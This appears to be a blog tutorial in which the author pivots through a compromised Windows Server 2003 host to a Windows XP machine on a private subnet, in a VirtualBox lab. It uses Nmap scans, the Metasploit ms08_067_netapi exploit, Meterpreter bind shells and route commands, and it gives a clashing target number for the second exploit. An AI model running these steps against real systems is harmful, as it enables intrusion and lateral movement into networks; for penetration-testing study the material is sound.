Pivoting is a powerful technique within the Metasploit Framework that allows a hacker to access a private subnet within a network. For example, an attacker would compromise a host (ex: web server) that is accessible (i.e., routable IP address) and use that host as a staging point to pivot and compromise other systems in subnets that would not have been accessible from outside the network. According to Metasploit, pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console.
For this setup, I will use the following VirtualBox virtual machines:
For this setup, I will use the following VirtualBox virtual machines:
o
Attacker machine
o
192.168.1.107
·
Windows
Server 2003
o
Web Server
o
Accessible (Public IP) – 192.168.1.105
o
Non-accessible (Private IP) – 192.168.56.102
·
Windows XP
o
Host machine
o
192.168.56.103
In the following tutorial, I will use the BackTrack
5 machine to exploit the web server (Windows Server 2003) and setup a staging
point on the server for pivot to the Windows XP host that is only accessible to
users inside the network.
First, I will map the network with Nmap
to discover any accessible hosts
·
nmap -sS 192.168.1.1/24
Once I discovered 192.168.1.105, I will scan for open ports and
services running
·
nmap –sV -O 192.168.1.105
The scan informs me that port 80 (web server port for public
access) is running an Apache Web Server; along with port 135 and port 139. I use the Windows netapi
exploit, known as “Server Service Vulnerability.”
·
use windows/smb/ms08_067_netapi
·
show payloads
·
set PAYLOAD windows/meterpreter/bind_tcp
o
Bind shell is a payload that
“binds” a command prompt to a listening port on the target machine,
which the attacker can then connect and maintain access to the machine.
·
show options
o
View what settings are needed.
·
set RHOST 192.168.1.105
·
show targets
o
To specify our specific target
·
set target 9
o
Target 9 is Windows Server 2003 SP1
·
exploit
Once the host is exploited, a meterpreter
session is created and our machine has direct access and control over the
machine. We confirm this by
entering the ipconfig command to view the IP address. The command returns:
·
192.168.1.105 / 255.255.255.0
·
192.168.56.102 / 255.255.255.0
Since we do not have access to the 192.168.56.0 network, we will
run an ARP scan and discover hosts that are up in the network.
·
run arp_scanner -r
192.168.56.1/24
With the discovered network and hosts, we will setup a route to
have the private network send packets (data) through our machine (meterpreter session id). First, we have to background our meterpreter session.
·
background
·
route add 192.168.56.1 255.255.255.0 1
o
The command will route the subnet traffic
through our meterpreter session id, 1.
o
You can view the session id by entering the
command sessions –l
·
route print
o
To view the previously entered command
We need to do a port scan on the discovered host from the arp_scan to find a port that we can setup
communication. First, we need to go
back and access the auxiliary module for TCP port scanning. The required settings that will be set is the remote host (RHOSTS).
·
back
·
use scanner/portscan/tcp
·
show options
·
set RHOSTS 192.168.56.103
·
run
Port 25, 80, 135, and 139 are open. We will use the RPC exploit in port 135
and subsequently have direct access and control over the machine with a meterpreter session.
·
back
·
use windows/smb/ms08_067_netapi
·
show options
·
set RHOST 192.168.56.103
·
set PAYLOAD windows/meterpreter/bind_tcp
·
show options
·
show targets
o
To specify our specific target
·
set target 9
o
Target 3 is Windows XP SP2
·
exploit
A meterpreter session should be created
and the attacker machine has full control of the compromised host in the
private subnet. Type
ipconfig to
view the compromised host IP configuration.
Background the meterpreter
session by entering the command background.
View your sessions by typing sessions.
The output will display the steps you have taken to get from your
machine to the host in the private subnet under the “Connection”
column.
- 192.168.1.107:59377 -> 192.168.1.105:4444
- From the attacker machine to the web server
- 192.168.1.107-192.168.1.105:0 -> 192.168.56.103:4444
- From the web server to the XP host
No comments:
Post a Comment